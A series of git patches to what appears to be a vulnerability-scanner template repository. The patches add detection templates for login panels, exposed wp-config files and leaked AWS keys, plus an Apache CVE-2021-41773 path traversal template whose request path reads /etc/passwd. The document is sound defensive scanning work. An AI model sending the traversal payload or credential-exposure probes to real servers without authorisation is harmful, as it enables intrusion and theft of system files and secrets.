-5,7 +5,7 @@ info: author: zzeitlin reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info - tags: api,instagram,graph + tags: token-spray,instagram,graph requests: - method: GET diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index d3ef60d523..f64daea02e 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://ipstack.com/documentation severity: info - tags: api,ipstack + tags: token-spray,ipstack requests: - method: GET diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index 9b4df40127..a8bb4d5847 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://api.iterable.com/api/docs severity: info - tags: api,iterable + tags: token-spray,iterable requests: - method: GET diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml index 2f061c8e5a..a885c5c780 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key severity: info - tags: api,jumpcloud + tags: token-spray,jumpcloud requests: - method: GET diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index e13f8ac382..0c937b51fa 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://app.lokalise.com/api2docs/curl/#resource-projects severity: info - tags: api,lokalise + tags: token-spray,lokalise requests: - method: GET diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index 3ce25928dd..d0ed434602 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ severity: info - tags: api,loqate + tags: token-spray,loqate requests: - method: GET diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 64443cccdb..9d7073e46c 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info - tags: api,mailchimp + tags: token-spray,mailchimp network: - inputs: diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 4a14c40124..3667ba1c69 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://documentation.mailgun.com/en/latest/api-intro.html severity: info - tags: api,mailgun + tags: token-spray,mailgun requests: - method: GET diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index 13ba4c7ff2..c4640d9695 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.mapbox.com/api/search/geocoding/ severity: info - tags: api,mapbox + tags: token-spray,mapbox requests: - method: GET diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index 04d4d1b4a3..d67d458faa 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ severity: info - tags: api,newrelic,nerdgraph + tags: token-spray,newrelic,nerdgraph requests: - method: POST diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index b7ca0cb98f..cfe2c86746 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.npmjs.com/creating-and-viewing-access-tokens severity: info - tags: api,node,npm,package,manager + tags: token-spray,node,npm,package,manager requests: - method: GET diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 5ace495d7e..1a9a5058e3 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://openweathermap.org/current severity: info - tags: api,weather,openweather + tags: token-spray,weather,openweather requests: - method: GET diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index b572ed19bc..fcc00d7e88 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developer.pagerduty.com/api-reference severity: info - tags: api,pagerduty + tags: token-spray,pagerduty requests: - method: GET diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 696696b01d..8ea141bcc0 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://help.pendo.io/resources/support-library/api/index.html severity: info - tags: api,pendo + tags: token-spray,pendo requests: - method: GET diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index 5f8ce314f1..c52e04af9a 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://www.pivotaltracker.com/help/api severity: info - tags: api,pivotaltracker + tags: token-spray,pivotaltracker requests: - method: GET diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index a061bf63ae..5b5aead0dc 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://postmarkapp.com/developer/api/overview severity: info - tags: api,postmark + tags: token-spray,postmark requests: - method: GET diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index fa881c48f0..b887b0b7d1 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info - tags: api,sendgrid + tags: token-spray,sendgrid network: - inputs: diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index 01b6937ce4..2703830f3a 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://api.slack.com/methods/auth.test severity: info - tags: api,slack + tags: token-spray,slack requests: - method: POST diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index 61a68b1850..fdf0dc6724 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://sonarcloud.io/web_api/api/authentication severity: info - tags: api,sonarcloud + tags: token-spray,sonarcloud requests: - method: GET diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 3f6cb05a27..2ccc098209 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ severity: info - tags: api,spotify + tags: token-spray,spotify requests: - method: GET diff --git a/token-spray/square.yaml b/token-spray/square.yaml index 93fe826fad..383e3ddc8a 100644 --- a/token-spray/square.yaml +++ b/token-spray/square.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developer.squareup.com/explorer/square/locations-api/list-locations severity: info - tags: api,square + tags: token-spray,square requests: - method: GET diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml index f33b6d1a0b..16e358e75a 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/stripe.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://stripe.com/docs/api/authentication severity: info - tags: api,stripe + tags: token-spray,stripe requests: - method: GET diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml index 9755bbe6b1..922e62848b 100644 --- a/token-spray/tinypng.yaml +++ b/token-spray/tinypng.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://tinypng.com/developers severity: info - tags: api,tinypng + tags: token-spray,tinypng requests: - method: POST diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml index c41d77e4a1..5212516fc1 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/travisci.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developer.travis-ci.com/ severity: info - tags: api,travis + tags: token-spray,travis requests: - method: GET diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml index 01bc85009f..d648daa0d1 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/twitter.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index severity: info - tags: api,twitter + tags: token-spray,twitter requests: - method: GET diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml index 93df5620a3..a05d17e57a 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/visualstudio.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://openapi.appcenter.ms/ severity: info - tags: api,visualstudio,microsoft + tags: token-spray,visualstudio,microsoft requests: - method: GET diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml index 8dee8ffbe4..b48ed5e79f 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/wakatime.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://wakatime.com/developers severity: info - tags: api,wakatime + tags: token-spray,wakatime requests: - method: GET diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml index e42fd12eb0..9c1a8e2874 100644 --- a/token-spray/weglot.yaml +++ b/token-spray/weglot.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developers.weglot.com/api/reference severity: info - tags: api,weglot + tags: token-spray,weglot requests: - method: POST diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml index 1f7ed899ff..3ab7726092 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/youtube.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://developers.google.com/youtube/v3/docs severity: info - tags: api,youtube + tags: token-spray,youtube requests: - method: GET From 49c198f8010ccc27763243e144a34808c912361f Mon Sep 17 00:00:00 2001 From: Daniel Roberson Date: Mon, 4 Oct 2021 19:36:01 -0700 Subject: [PATCH 2742/4083] initial commit --- iot/apc-ups-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 iot/apc-ups-login.yaml diff --git a/iot/apc-ups-login.yaml b/iot/apc-ups-login.yaml new file mode 100644 index 0000000000..caa407dd50 --- /dev/null +++ b/iot/apc-ups-login.yaml @@ -0,0 +1,22 @@ +id: apc-ups-login + +info: + name: APC UPS login page + author: droberson + reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + severity: low + tags: iot + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + matchers-condition: and + matchers: + - type: word + words: + - 'APC | Log On' + part: body + - type: status + status: + - 200 From 3b714d2c33d32829216896467d3f8582547b61ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 15:12:53 +0530 Subject: [PATCH 2743/4083] Update apc-ups-login.yaml --- iot/apc-ups-login.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/iot/apc-ups-login.yaml b/iot/apc-ups-login.yaml index caa407dd50..f28e384f2c 100644 --- a/iot/apc-ups-login.yaml +++ b/iot/apc-ups-login.yaml @@ -1,22 +1,24 @@ id: apc-ups-login info: - name: APC UPS login page + name: APC UPS Login author: droberson + severity: info reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - severity: low - tags: iot + tags: iot,panel requests: - method: GET path: - "{{BaseURL}}/logon.htm" + matchers-condition: and matchers: - type: word words: - 'APC | Log On' part: body + - type: status status: - 200 From 83c1e0d84d21304f02de2a4c82b0d2e8746b9fe2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 16:28:29 +0530 Subject: [PATCH 2744/4083] Update and rename remkon-device-manager-detect.yaml to remkon-manager-detect.yaml --- ...vice-manager-detect.yaml => remkon-manager-detect.yaml} | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename technologies/{remkon-device-manager-detect.yaml => remkon-manager-detect.yaml} (70%) diff --git a/technologies/remkon-device-manager-detect.yaml b/technologies/remkon-manager-detect.yaml similarity index 70% rename from technologies/remkon-device-manager-detect.yaml rename to technologies/remkon-manager-detect.yaml index 1b541fad52..3d74086597 100644 --- a/technologies/remkon-device-manager-detect.yaml +++ b/technologies/remkon-manager-detect.yaml @@ -1,10 +1,10 @@ -id: remkon-device-manager-detect +id: remkon-manager-detect info: - name: Remkon Device Manager Detected + name: Remkon Device Manager Detect author: pikpikcu severity: info - tags: remkon,tech + tags: remkon,tech,panel requests: - method: GET @@ -21,4 +21,3 @@ requests: part: body words: - "Remkon Device Manager" - - "NASCENT Technology, LLC." From 6e7b91f6dcec830e420d0bf5f7a89d683866952c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 18:02:50 +0530 Subject: [PATCH 2745/4083] Update wordpress-accessible-wpconfig.yaml --- .../wordpress/wordpress-accessible-wpconfig.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 57234bca1d..683cf92dc3 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -3,7 +3,7 @@ info: name: WordPress accessible wp-config author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high - tags: wordpress,backups + tags: wordpress,backup requests: - method: GET @@ -34,9 +34,11 @@ requests: matchers: - type: word words: - - DB_NAME - - DB_PASSWORD + - "DB_NAME" + - "DB_PASSWORD" part: body + condition: and + - type: status status: - 200 From fe59937e9b7b5df5f3590d06c98fecd2ebd57934 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 18:12:55 +0530 Subject: [PATCH 2746/4083] Update and rename aws-s3-access-key-leak.yaml to wpconfig-aws-keys.yaml --- ...s3-access-key-leak.yaml => wpconfig-aws-keys.yaml} | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) rename misconfiguration/{aws-s3-access-key-leak.yaml => wpconfig-aws-keys.yaml} (62%) diff --git a/misconfiguration/aws-s3-access-key-leak.yaml b/misconfiguration/wpconfig-aws-keys.yaml similarity index 62% rename from misconfiguration/aws-s3-access-key-leak.yaml rename to misconfiguration/wpconfig-aws-keys.yaml index 50ed2ada6d..afc870353f 100644 --- a/misconfiguration/aws-s3-access-key-leak.yaml +++ b/misconfiguration/wpconfig-aws-keys.yaml @@ -1,10 +1,10 @@ -id: aws-s3-access-key-leak +id: wpconfig-aws-keys info: - name: AWS S3 KEYS - author: Rizwan Syed @r12w4n + name: AWS S3 keys Leak + author: r12w4n severity: high - tags: aws,s3,bucket,tech + tags: aws,s3,wordpress,disclosure requests: - method: GET @@ -18,4 +18,7 @@ requests: words: - 'access-key-id' - 'secret-access-key' + - 'DB_NAME' + - 'DB_PASSWORD' + condition: and part: body From 5a184a08756cff1ce83935a0877af0e936c5c3bb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 18:13:12 +0530 Subject: [PATCH 2747/4083] Update wpconfig-aws-keys.yaml --- misconfiguration/wpconfig-aws-keys.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/misconfiguration/wpconfig-aws-keys.yaml b/misconfiguration/wpconfig-aws-keys.yaml index afc870353f..7b640cdf3b 100644 --- a/misconfiguration/wpconfig-aws-keys.yaml +++ b/misconfiguration/wpconfig-aws-keys.yaml @@ -12,7 +12,6 @@ requests: - '{{BaseURL}}/wp-config.php-backup' - "{{BaseURL}}/%c0" - matchers-condition: and matchers: - type: word words: From 5c4dd11b6beda15aa46227e7ee3bb1f4a478f9f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 18:20:43 +0530 Subject: [PATCH 2748/4083] Rename misconfiguration/wpconfig-aws-keys.yaml to exposures/configs/wpconfig-aws-keys.yaml --- {misconfiguration => exposures/configs}/wpconfig-aws-keys.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {misconfiguration => exposures/configs}/wpconfig-aws-keys.yaml (100%) diff --git a/misconfiguration/wpconfig-aws-keys.yaml b/exposures/configs/wpconfig-aws-keys.yaml similarity index 100% rename from misconfiguration/wpconfig-aws-keys.yaml rename to exposures/configs/wpconfig-aws-keys.yaml From b22eca296e188bf50a48f163edf92f3b9e4e47e6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 18:42:46 +0530 Subject: [PATCH 2749/4083] Create skycaiji-admin-panel.yaml --- exposed-panels/skycaiji-admin-panel.yaml | 33 ++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/skycaiji-admin-panel.yaml diff --git a/exposed-panels/skycaiji-admin-panel.yaml b/exposed-panels/skycaiji-admin-panel.yaml new file mode 100644 index 0000000000..c3d0aac283 --- /dev/null +++ b/exposed-panels/skycaiji-admin-panel.yaml @@ -0,0 +1,33 @@ +id: skycaiji-admin-panel + +info: + name: SkyCaiji Admin Panel + author: princechaddha + severity: info + tags: panel,tech + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?s=/admin/Index/index" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '

    Powered by ' + - '' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>' From 47720d5da6ad1cd71ab6b112e62b5ccbfdfabd8d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 5 Oct 2021 21:49:36 +0700 Subject: [PATCH 2750/4083] Create CVE-2021-41773.yaml --- cves/2021/CVE-2021-41773.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-41773.yaml diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml new file mode 100644 index 0000000000..5dbdff0236 --- /dev/null +++ b/cves/2021/CVE-2021-41773.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-41773 + +info: + name: Path Traversal Apache 2.4.49 + author: daffainfo + severity: high + description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + reference: + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + tags: cve,cve2021,lfi,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 876a83371f43ad47e35e6ff2759f17c31d729763 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 20:32:16 +0530 Subject: [PATCH 2751/4083] misc update --- cves/2021/CVE-2021-41773.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 5dbdff0236..feddc6cf4d 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -1,19 +1,20 @@ id: CVE-2021-41773 info: - name: Path Traversal Apache 2.4.49 + name: Apache 2.4.49 - Path Traversal author: daffainfo severity: high description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://twitter.com/h4x0r_dz/status/1445401960371429381 tags: cve,cve2021,lfi,apache requests: - method: GET path: - - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd" + - "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" matchers-condition: and matchers: @@ -24,4 +25,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 311f1b006c4d4f999126864f4d9cfd51dafc5298 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 20:33:10 +0530 Subject: [PATCH 2752/4083] more sources --- cves/2021/CVE-2021-41773.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index feddc6cf4d..b180075675 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -8,6 +8,7 @@ info: reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 tags: cve,cve2021,lfi,apache From 796ccd1d9dce0ade71d70b7a86210a07d879618f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Oct 2021 20:36:02 +0530 Subject: [PATCH 2753/4083] Update CVE-2021-41773.yaml --- cves/2021/CVE-2021-41773.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index b180075675..ac1d10da37 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - tags: cve,cve2021,lfi,apache + tags: cve,cve2021,lfi,apache,misconfig requests: - method: GET @@ -26,4 +26,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 937ff9f7eed51c0989cde0d3e3ae0893cdc65af8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 22:00:59 +0530 Subject: [PATCH 2754/4083] misc update --- cves/2020/CVE-2020-0618.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index acbb89de1a..10f870957f 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -5,9 +5,6 @@ info: author: joeldeleep description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. severity: high - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[1] below. - # This template works by guessing user ID. reference: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 From 231c35620f2660fb7c78654b1ed9eec675a0d1f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Oct 2021 16:35:58 +0000 Subject: [PATCH 2755/4083] Auto Generated Templates Stats [Tue Oct 5 16:35:58 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1710 ++++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 909 insertions(+), 823 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index df18b61cf9..6dc884cfcd 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":804},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":191},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":97},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":26},{"name":"generic","count":23},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"zoho","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"ibm","count":7},{"name":"microsoft","count":7},{"name":"google","count":7},{"name":"backup","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"hp","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"jetty","count":6},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"fileupload","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"deserialization","count":5},{"name":"nodejs","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"dedecms","count":5},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"thinkcmf","count":4},{"name":"symantec","count":4},{"name":"vpn","count":4},{"name":"glpi","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"zabbix","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"firmware","count":4},{"name":"fatpipe","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"strapi","count":4},{"name":"wso2","count":4},{"name":"exchange","count":4},{"name":"crlf","count":4},{"name":"resin","count":4},{"name":"symfony","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"grafana","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"telerik","count":3},{"name":"ebs","count":3},{"name":"springcloud","count":3},{"name":"openssh","count":3},{"name":"zhiyuan","count":3},{"name":"lfr","count":3},{"name":"vbulletin","count":3},{"name":"terramaster","count":3},{"name":"azure","count":3},{"name":"opensis","count":3},{"name":"kibana","count":3},{"name":"hoteldruid","count":3},{"name":"prometheus","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"linkerd","count":3},{"name":"microstrategy","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"backups","count":3},{"name":"kevinlab","count":3},{"name":"itop","count":3},{"name":"bigip","count":3},{"name":"smtp","count":3},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"kafka","count":3},{"name":"mail","count":3},{"name":"npm","count":3},{"name":"jeesns","count":3},{"name":"amazon","count":3},{"name":"druid","count":3},{"name":"slack","count":3},{"name":"httpd","count":3},{"name":"mongodb","count":3},{"name":"fpd","count":3},{"name":"log","count":3},{"name":"cve2007","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"jellyfin","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"backdoor","count":3},{"name":"nexus","count":3},{"name":"firebase","count":3},{"name":"seeyon","count":2},{"name":"axis2","count":2},{"name":"wuzhicms","count":2},{"name":"ilo","count":2},{"name":"dos","count":2},{"name":"mida","count":2},{"name":"yapi","count":2},{"name":"